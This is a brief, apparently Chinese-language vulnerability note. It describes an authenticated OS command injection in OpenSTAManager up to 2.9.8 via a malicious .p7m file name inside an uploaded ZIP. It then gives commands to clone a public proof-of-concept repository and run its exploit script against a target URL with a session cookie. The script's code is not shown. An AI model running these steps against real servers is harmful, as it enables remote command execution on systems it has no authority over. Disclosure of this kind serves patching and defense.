https://github.com/advisories/GHSA-25fp-8w8p-mx36
OpenSTAManager(版本 <= 2.9.8)的 P7M(签名 XML)文件解码功能中存在一个严重的操作系统命令注入漏洞。经过身份验证的攻击者可以上传一个 ZIP 文件,其中包含一个带有恶意文件名的 .p7m 文件,从而在服务器上执行任意系统命令。
git clone https://github.com/xorandd/CVE-2025-69212-PoC
cd CVE-2025-69212-PoC
python3 CVE-2025-69212.py -u http://target.com -C <PHPSESSID_cookie>
CVE-2025-69212.py [-h] -u URL -C COOKIE
options:
-h, --help show this help message and exit
-u, --url URL target url, eg http://127.0.0.1
-C, --cookie COOKIE cookie value